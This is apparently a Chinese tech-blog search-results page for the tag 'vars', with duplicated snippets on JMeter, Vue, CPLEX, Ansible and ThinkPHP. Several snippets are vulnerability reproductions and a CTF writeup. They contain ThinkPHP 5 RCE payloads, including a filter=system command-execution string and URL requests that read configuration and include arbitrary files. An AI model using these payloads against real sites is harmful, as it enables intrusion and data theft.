搜索结果
查询Tags标签: vars,共有 47条记录-
thinkphp漏洞复现
0x00:总述 在版本小于5.0.13,不开启debug的情况下 会通过变量覆盖修改$request类的变量的值通过bindParams中的param函数进行任意函数调用 _method=__construct&method=get&filter=system&s=whoami在版本小于5.0.13,开启debug的情况下会执行命令两次 一次在…
2021/12/30 14:08:27 人评论 次浏览 -
Jmeter添加BeanShell预处理程序保存正则提取参数
使用如下代码:og.info(vars.get("mid"));FileWriter fstream = new FileWriter("D://Beanshell.txt", true); BufferedWriter out = new BufferedWriter(fstream); out.write(vars.get("mid")+"\n"); out.close(); fstream.clos…
2021/10/15 7:15:54 人评论 次浏览 -
Jmeter添加BeanShell预处理程序保存正则提取参数
使用如下代码:og.info(vars.get("mid"));FileWriter fstream = new FileWriter("D://Beanshell.txt", true); BufferedWriter out = new BufferedWriter(fstream); out.write(vars.get("mid")+"\n"); out.close(); fstream.clos…
2021/10/15 7:15:54 人评论 次浏览 -
vue 项目报错出现error 'resp' is defined but never used no-unused-vars
原因错误描述:App.vue中的 ‘resp’ 已定义定义却从未使用过在该行后面加上// eslint-disable-line no-unused-vars
2021/9/29 6:10:40 人评论 次浏览 -
vue 项目报错出现error 'resp' is defined but never used no-unused-vars
原因错误描述:App.vue中的 ‘resp’ 已定义定义却从未使用过在该行后面加上// eslint-disable-line no-unused-vars
2021/9/29 6:10:40 人评论 次浏览 -
Thinkphp5未开启强制路由导致的RCE 漏洞复现与分析
影响版本 小于5.0.23小于5.1.30 5.0.x ?s=index/think\config/get&name=database.username # 获取配置信息 ?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件 ?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件 ?s=…
2021/9/29 1:12:37 人评论 次浏览 -
Thinkphp5未开启强制路由导致的RCE 漏洞复现与分析
影响版本 小于5.0.23小于5.1.30 5.0.x ?s=index/think\config/get&name=database.username # 获取配置信息 ?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件 ?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件 ?s=…
2021/9/29 1:12:37 人评论 次浏览 -
XCTF_Web_003_php_rce
Writeup 看题目,应该是ThinkPHP的RCE漏洞 ThinkPHP的V5版本未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法 // 获取控制器名 $controller = strip_tags($result[1] ?: $this->rule->getConfig(default_controller));不知怎么利用就google搜一…
2021/9/16 22:35:15 人评论 次浏览 -
XCTF_Web_003_php_rce
Writeup 看题目,应该是ThinkPHP的RCE漏洞 ThinkPHP的V5版本未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法 // 获取控制器名 $controller = strip_tags($result[1] ?: $this->rule->getConfig(default_controller));不知怎么利用就google搜一…
2021/9/16 22:35:15 人评论 次浏览 -
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
个人博客:coonaa.cn 【本文博客同步地址】1. 漏洞简介 ThinkPHP 是一款运用极广的 PHP 开发框架。 在版本 5 中,由于框架没有对控制器名进行正确检测处理,导致在网站没有开启强制路由的情况(即默认情况)下可以执行任意方法,从而导致远程命令执行漏洞。 受影响的版本…
2021/9/16 17:08:16 人评论 次浏览 -
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
个人博客:coonaa.cn 【本文博客同步地址】1. 漏洞简介 ThinkPHP 是一款运用极广的 PHP 开发框架。 在版本 5 中,由于框架没有对控制器名进行正确检测处理,导致在网站没有开启强制路由的情况(即默认情况)下可以执行任意方法,从而导致远程命令执行漏洞。 受影响的版本…
2021/9/16 17:08:16 人评论 次浏览 -
使用C++调用cplex求解LP问题(一)
教材——《get started with cplex》 求解一个简单的LP问题,问题描述如下 使用C++语言编写,代码如下: #include<ilcplex/ilocplex.h> ILOSTLBEGIN int main(int argc, char** argv) //argc 表示传入main函数的参数个数; argv 表示传入main函数的参数序列或者指…
2021/9/5 22:07:05 人评论 次浏览 -
使用C++调用cplex求解LP问题(一)
教材——《get started with cplex》 求解一个简单的LP问题,问题描述如下 使用C++语言编写,代码如下: #include<ilcplex/ilocplex.h> ILOSTLBEGIN int main(int argc, char** argv) //argc 表示传入main函数的参数个数; argv 表示传入main函数的参数序列或者指…
2021/9/5 22:07:05 人评论 次浏览 -
ansible变量
引用变量,每个ip后面加上变量 组变量vars:group_vars里面定义变量:
2021/8/7 6:07:48 人评论 次浏览 -
ansible变量
引用变量,每个ip后面加上变量 组变量vars:group_vars里面定义变量:
2021/8/7 6:07:48 人评论 次浏览
